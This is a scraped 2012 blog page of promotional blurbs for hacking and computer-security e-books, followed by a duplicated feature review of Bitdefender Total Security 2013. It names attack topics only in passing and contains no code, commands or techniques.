    One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.

    Enjoy Hacking @Niranjan

    Hacking Exposed 5 (E-book)

    Posted at  Tuesday, November 13, 2012  |  in  HACKING  |  Read More»


    Hacking Exposed 5 (E-book)

    Hacking Exposed 


    Hacking Exposed-5 :-
    One of the international best-selling. The book walks through how to use the more powerful and popular hacker software, including L0phtCrack. This new edition has been updated extensively, largely with the results of "honeypot" exercises (in which attacks on sacrificial machines are monitored) and Windows 2000 public security trials. There's a lot of new stuff on e-mail worms, distributed denial-of-service (DDoS) attacks, and attacks that involve routing protocols. Hacking Exposed wastes no time in explaining how to implement the countermeasures--where they exist--that will render known attacks ineffective.

    Enjoy Hacking @Niranjan

    0 comments:


    Hack Attacks Testing (E-Book)

    Hack Attack Testing

    -: Hack Attacks Testing :-
    A network security breach (a hack, crack, or other invasion) occurs when unauthorized access to the network is achieved and havoc results.
    The best possible defense is an offensive strategy that allows you to regularly test your network to reveal the vulnerabilities and close the holes before someone gets in.
    Written by veteran author and security expert John Chirillo, Hack Attacks Testing explains how to perform your own security audits. 

    Enjoy Hacking @Niranjan

    Hack Attacks Testing (E-Book)

    Posted at  Tuesday, November 13, 2012  |  in  HACKING  |  Read More»


    Hack Attacks Testing (E-Book)

    Hack Attack Testing

    -: Hack Attacks Testing :-
    A network security breach (a hack, crack, or other invasion) occurs when unauthorized access to the network is achieved and havoc results.
    The best possible defense is an offensive strategy that allows you to regularly test your network to reveal the vulnerabilities and close the holes before someone gets in.
    Written by veteran author and security expert John Chirillo, Hack Attacks Testing explains how to perform your own security audits. 

    Enjoy Hacking @Niranjan

    0 comments:


    Secrets Of A Super Hacker (E-Book)

    Super Secret

    -: Secrets Of A Super Hacker :-
    Here is the most amazing book ever published on computer hacking. Step-by-Step illustrated details on the techniques used by hackers to get your data including :-
    Guessing Passwords, Stealing Passwords,
    Password Lists, Social Engineering,
    Reverse Social Engineering,
    Crashing Electronic Bulletin Boards,
    Dummy Screens, Fake E-mail,
    Trojan Horses, Viruses, Worms,
    Trap Doors, And Much more.
    Anyone concerned with computer security and data privacy needs to read this book.

    Enjoy Hacking @Niranjan

    Secrets Of A Super Hacker (E-Book)

    Posted at  Tuesday, November 13, 2012  |  in  HACKING  |  Read More»


    Secrets Of A Super Hacker (E-Book)

    Super Secret

    -: Secrets Of A Super Hacker :-
    Here is the most amazing book ever published on computer hacking. Step-by-Step illustrated details on the techniques used by hackers to get your data including :-
    Guessing Passwords, Stealing Passwords,
    Password Lists, Social Engineering,
    Reverse Social Engineering,
    Crashing Electronic Bulletin Boards,
    Dummy Screens, Fake E-mail,
    Trojan Horses, Viruses, Worms,
    Trap Doors, And Much more.
    Anyone concerned with computer security and data privacy needs to read this book.

    Enjoy Hacking @Niranjan

    0 comments:


    Viruses Revealed (E-Book)

    Viruses Revealed

    -: Viruses Revealed :-
    With the growing number of computer virus infections today--and the billions of dollars spent on clean-up efforts--virus protection has become everybody's business.
    This detailed guide offers full-scale coverage and analysis of the origin, structure, and technology behind the expanding array of computer viruses, and addresses current methods of detection and prevention. 
    Enjoy Hacking @Niranjan!

    Viruses Revealed (E-Book)

    Posted at  Tuesday, November 13, 2012  |  in  HACKING  |  Read More»


    Viruses Revealed (E-Book)

    Viruses Revealed

    -: Viruses Revealed :-
    With the growing number of computer virus infections today--and the billions of dollars spent on clean-up efforts--virus protection has become everybody's business.
    This detailed guide offers full-scale coverage and analysis of the origin, structure, and technology behind the expanding array of computer viruses, and addresses current methods of detection and prevention. 
    Enjoy Hacking @Niranjan!

    0 comments:


    Gray Hat Hacking (E-Book)


     
    -: Gray Hat Hacking :-
    A fantastic book for anyone looking to learn the tools and techniques needed to break in and stay in. Very highly recommended whether you are a seasoned professional or just starting out in the security business. Basically divided into five parts :-
    Part I: Introduction to Ethical Disclosure,
    Part II: Penetration Testing and Tools ,
    Part III: Exploits 101,
    Part IV: Vulnerability Analysis,
    Part V: Malware Analysis
    Enjoy Hacking @Niranjan

    Gray Hat Hacking (E-Book)

    Posted at  Tuesday, November 13, 2012  |  in  HACKING  |  Read More»


    Gray Hat Hacking (E-Book)


     
    -: Gray Hat Hacking :-
    A fantastic book for anyone looking to learn the tools and techniques needed to break in and stay in. Very highly recommended whether you are a seasoned professional or just starting out in the security business. Basically divided into five parts :-
    Part I: Introduction to Ethical Disclosure,
    Part II: Penetration Testing and Tools ,
    Part III: Exploits 101,
    Part IV: Vulnerability Analysis,
    Part V: Malware Analysis
    Enjoy Hacking @Niranjan

    0 comments:




    Hacker's Black Book

     
    Easy to understand with many examples. Every day you hear in the daily news about hackers, virus, worms and trojans, SUB7, TCP, IP, PING, spoofing, sniffing, DDOS attacks, ...?
    And you don't know exactly what it is and how hackers do that.
    Don't rest a "lamer", Hacker's Blackbook let's you know and discovers many secrets.
    Incredible how easy hacking and cracking is!
    The book shows how simple you can use these programs.
    And many more themes in 19 detailed chapters... 

    Enjoy Hacking @Niranjan

    Hacker's Black Book

    Posted at  Tuesday, November 13, 2012  |  in  HACKING  |  Read More»




    Hacker's Black Book

     
    Easy to understand with many examples. Every day you hear in the daily news about hackers, virus, worms and trojans, SUB7, TCP, IP, PING, spoofing, sniffing, DDOS attacks, ...?
    And you don't know exactly what it is and how hackers do that.
    Don't rest a "lamer", Hacker's Blackbook let's you know and discovers many secrets.
    Incredible how easy hacking and cracking is!
    The book shows how simple you can use these programs.
    And many more themes in 19 detailed chapters... 

    Enjoy Hacking @Niranjan

    1 comments:


    Bitdefender Total Security 2013 FullVersion


    Bitdefender Total Security 2013 is BitDefender’s new top of the line security product that leaves little to be desired in terms of functionality that it provides. It combines all the offerings of the company’s Antivirus Plus and Internet Security products with additional features that only it offers.
    If you are already a Bitdefender customer you are probably wondering what the company is offering in terms of new features or improvements in their 2013 lineup. We are going to look at that in detail later on in the article. Before that, lets take a look at the installation of the program first.

    bitdefender total security 2013
    The main program interface displays the four important areas antivirus, antispam, privacy and firewall by default, with Tune-up, Safebox, Update, Safego and File Encryption available either with a click on the right arrow or the slider that is displayed below the listing.
    You can rearrange the display with a click on the all modules button in the interface. Here you can modify it so that the four program modules that you are most interested in are displayed without scrolling.
    Most modules display an on and off switch on the screen which you can use to either turn them on or off completely, or to turn of some of their automatic functionality. Here it is for instance possible to turn of the automatic scanning of files or the firewall.
    Often used features, like scanning or updating, are available directly from that interface as well.  Lastly, the settings are also only a click away from the main interface.
    At the top, you see the general state of security of the system, events that require your attention, the autopilot switch, and a link to program settings overview

    Antivirus

    The antivirus module is one of the core components of the program. In terms of functionality, it has lots to offer. The autoscan feature for instance scans the system for threats when performance is not needed elsewhere. It also features realtime protection that scans files when you try to access them, options to run various quick, full or custom scans, and a vulnerability module that checks for Windows and application updates, or weak user account passwords.
    Scans are reasonably fast even though that depends largely on the speed of the hard drive, the amount of files and their sizes, and the computer performance in general. A quick scan took less than 2 minutes to complete on a test system, a full system scan about 15 minutes with the time estimate showing 1 minute left for about 5 minutes.
    antivirus scan
    The Vulnerability Scan is especially helpful as missing updates and patches are one of the key reasons why Windows PCs get infected by malware. It checks for critical and optional Windows Updates that have not yet been installed, application updates for important plugins and programs like Skype, Java or web browsers, and finally weak user account passwords. If something is not right, it offers to fix the issue or install updates to resolve it. It could support additional programs though.
    vulnerability scan
    As far as accuracy and detection rates go, Bitdefender has received high ratings from AVTest and AV Comparatives for their products.

    Firewall

    bitdefender firewall
    You may want to check the firewall’s settings first as some of its features are disabled by default. This includes the intrusion detection system that protects against the installation of malware drivers, Internet Connection Sharing, and the monitoring of Wi-Fi connections (also this may have been disabled because the system had no Wi-Fi adapter).
    If you are running on autopilot you really do not have to worry that much about the firewall. You are definitely not annoyed by alerts when another one of your regular applications tries to connect to the Internet. Users who want more control on the other hand can configure everything manually in the settings and with the help of prompts. The paranoid mode may be interesting which alerts you whenever new applications try to establish a connection on the Internet.
    As far as application rules go, there is lots that you can configure here. Just take a look at the screenshot below to see what you can configure when you add a new rule for an application to the firewall rule set.
    firewall
    Unless I’m mistaken though there does not seem to be a way to specify certain ports for an application

    The new and improved features

    Bitdefender Safepay is one of the core new features that Bitdefender integrated into Total Security 2013. It basically aims to make transactions and other critical operations on the Internet more secure by running them in a browser that is separated from the rest of the environment. That’s good because it protects from a number of potential threats, e.g. keyloggers, and not so good because it is displayed in a separate environment where you do not have access to desktop apps and programs. If you are using a password manager for instance, you can’t make use of it to sign in on websites.
    Safepay can be started manually or automatically according to Bitdefender. Manually worked fine during tests, but I could not get the automatic feature to work at all no matter which browser I tried and whether I explicitly added  websites to the list of Safepay sites.
    The program’s parental controls have been upgraded. They do require an account at Bitdefender to make use of them though. You can either create a new account or sign in with Facebook or Google instead. From here you can monitor and configure many features, including the monitoring of Facebook and web browsing in general, and even phone calls if an app is installed on Android phones.
    A few things are missing though, like a similar app for iOS devices or support for more instant messengers.
    The anti-theft module is another new addition to the Total Security suite. It too requires a Bitdefender account which you can then use to locate and lock a stolen PC or laptop, and to wipe data to make sure the thief can’t access it. This obviously only works if you have configured the feature when the device was still in your possession, and if the thief is connecting the PC to the Internet in its current state. If the hard drives are formatted, or a new OS is used, it won’t be effective.
    Total Security users get access to 2 Gigabyte of free secure online storage, and access to a number of tools that I have not mentioned yet. This includes a file shredder to delete files permanently, encrypted storage to protect files from being access by third parties, or a tune-up module to speed up the PC.

    Bitdefender Product comparison

    • Antivirus Plus: Antivirus and Antispyware, Bitdefender Autopilot, Bitdefender Safepay, USB Immunizer, Enhanced MyBitdefender dashboard, Search Advisor, Social Network Protection, Personal Data Filter, Antiphishing, Scan Dispatcher
    • Internet Security: Antispam, Enhanced Parental Control, Two-way firewall, File Shredder
    • Total Security: Bitdefender Safebox, Anti Theft, File Encryption, Tune-up
    Total Security contains all features that Internet Security and Antivirus Plus is offering, while Internet Security contains the Antivirus Plus features as well.

    Closing Words

    Bitdefender Total Security 2013 is a big suite that combines security products with related products. The program’s autopilot mode ensures that it is a good choice for users of all experience levels. Experienced users will find the manual options suitable for most tasks, even though they could be improved in some regards. The application vulnerability scanner for instance could use additional support for popular applications that it is currently not detecting.
    All in all though it is a beast of a program. Users who do not need antispam, parental controls, the anti theft module or file encryption can take a look at Internet Security instead.

    Enjoy Hacking @Niranjan

    Bitdefender Total Security 2013 FullVersion

    Posted at  Tuesday, November 13, 2012  |  in  antivirous  |  Read More»


    Bitdefender Total Security 2013 FullVersion


    Bitdefender Total Security 2013 is BitDefender’s new top of the line security product that leaves little to be desired in terms of functionality that it provides. It combines all the offerings of the company’s Antivirus Plus and Internet Security products with additional features that only it offers.
    If you are already a Bitdefender customer you are probably wondering what the company is offering in terms of new features or improvements in their 2013 lineup. We are going to look at that in detail later on in the article. Before that, lets take a look at the installation of the program first.

    bitdefender total security 2013
    The main program interface displays the four important areas antivirus, antispam, privacy and firewall by default, with Tune-up, Safebox, Update, Safego and File Encryption available either with a click on the right arrow or the slider that is displayed below the listing.
    You can rearrange the display with a click on the all modules button in the interface. Here you can modify it so that the four program modules that you are most interested in are displayed without scrolling.
    Most modules display an on and off switch on the screen which you can use to either turn them on or off completely, or to turn of some of their automatic functionality. Here it is for instance possible to turn of the automatic scanning of files or the firewall.
    Often used features, like scanning or updating, are available directly from that interface as well.  Lastly, the settings are also only a click away from the main interface.
    At the top, you see the general state of security of the system, events that require your attention, the autopilot switch, and a link to program settings overview

    Antivirus

    The antivirus module is one of the core components of the program. In terms of functionality, it has lots to offer. The autoscan feature for instance scans the system for threats when performance is not needed elsewhere. It also features realtime protection that scans files when you try to access them, options to run various quick, full or custom scans, and a vulnerability module that checks for Windows and application updates, or weak user account passwords.
    Scans are reasonably fast even though that depends largely on the speed of the hard drive, the amount of files and their sizes, and the computer performance in general. A quick scan took less than 2 minutes to complete on a test system, a full system scan about 15 minutes with the time estimate showing 1 minute left for about 5 minutes.
    antivirus scan
    The Vulnerability Scan is especially helpful as missing updates and patches are one of the key reasons why Windows PCs get infected by malware. It checks for critical and optional Windows Updates that have not yet been installed, application updates for important plugins and programs like Skype, Java or web browsers, and finally weak user account passwords. If something is not right, it offers to fix the issue or install updates to resolve it. It could support additional programs though.
    vulnerability scan
    As far as accuracy and detection rates go, Bitdefender has received high ratings from AVTest and AV Comparatives for their products.

    Firewall

    bitdefender firewall
    You may want to check the firewall’s settings first as some of its features are disabled by default. This includes the intrusion detection system that protects against the installation of malware drivers, Internet Connection Sharing, and the monitoring of Wi-Fi connections (also this may have been disabled because the system had no Wi-Fi adapter).
    If you are running on autopilot you really do not have to worry that much about the firewall. You are definitely not annoyed by alerts when another one of your regular applications tries to connect to the Internet. Users who want more control on the other hand can configure everything manually in the settings and with the help of prompts. The paranoid mode may be interesting which alerts you whenever new applications try to establish a connection on the Internet.
    As far as application rules go, there is lots that you can configure here. Just take a look at the screenshot below to see what you can configure when you add a new rule for an application to the firewall rule set.
    firewall
    Unless I’m mistaken though there does not seem to be a way to specify certain ports for an application

    The new and improved features

    Bitdefender Safepay is one of the core new features that Bitdefender integrated into Total Security 2013. It basically aims to make transactions and other critical operations on the Internet more secure by running them in a browser that is separated from the rest of the environment. That’s good because it protects from a number of potential threats, e.g. keyloggers, and not so good because it is displayed in a separate environment where you do not have access to desktop apps and programs. If you are using a password manager for instance, you can’t make use of it to sign in on websites.
    Safepay can be started manually or automatically according to Bitdefender. Manually worked fine during tests, but I could not get the automatic feature to work at all no matter which browser I tried and whether I explicitly added  websites to the list of Safepay sites.
    The program’s parental controls have been upgraded. They do require an account at Bitdefender to make use of them though. You can either create a new account or sign in with Facebook or Google instead. From here you can monitor and configure many features, including the monitoring of Facebook and web browsing in general, and even phone calls if an app is installed on Android phones.
    A few things are missing though, like a similar app for iOS devices or support for more instant messengers.
    The anti-theft module is another new addition to the Total Security suite. It too requires a Bitdefender account which you can then use to locate and lock a stolen PC or laptop, and to wipe data to make sure the thief can’t access it. This obviously only works if you have configured the feature when the device was still in your possession, and if the thief is connecting the PC to the Internet in its current state. If the hard drives are formatted, or a new OS is used, it won’t be effective.
    Total Security users get access to 2 Gigabyte of free secure online storage, and access to a number of tools that I have not mentioned yet. This includes a file shredder to delete files permanently, encrypted storage to protect files from being access by third parties, or a tune-up module to speed up the PC.

    Bitdefender Product comparison

    • Antivirus Plus: Antivirus and Antispyware, Bitdefender Autopilot, Bitdefender Safepay, USB Immunizer, Enhanced MyBitdefender dashboard, Search Advisor, Social Network Protection, Personal Data Filter, Antiphishing, Scan Dispatcher
    • Internet Security: Antispam, Enhanced Parental Control, Two-way firewall, File Shredder
    • Total Security: Bitdefender Safebox, Anti Theft, File Encryption, Tune-up
    Total Security contains all features that Internet Security and Antivirus Plus is offering, while Internet Security contains the Antivirus Plus features as well.

    Closing Words

    Bitdefender Total Security 2013 is a big suite that combines security products with related products. The program’s autopilot mode ensures that it is a good choice for users of all experience levels. Experienced users will find the manual options suitable for most tasks, even though they could be improved in some regards. The application vulnerability scanner for instance could use additional support for popular applications that it is currently not detecting.
    All in all though it is a beast of a program. Users who do not need antispam, parental controls, the anti theft module or file encryption can take a look at Internet Security instead.

    Enjoy Hacking @Niranjan

    0 comments:

    About-Privacy Policy-Contact us
    Copyright © 2013 infinityCEH. Blogger Template by Bloggertheme9
    Proudly Powered by Blogger.
    back to top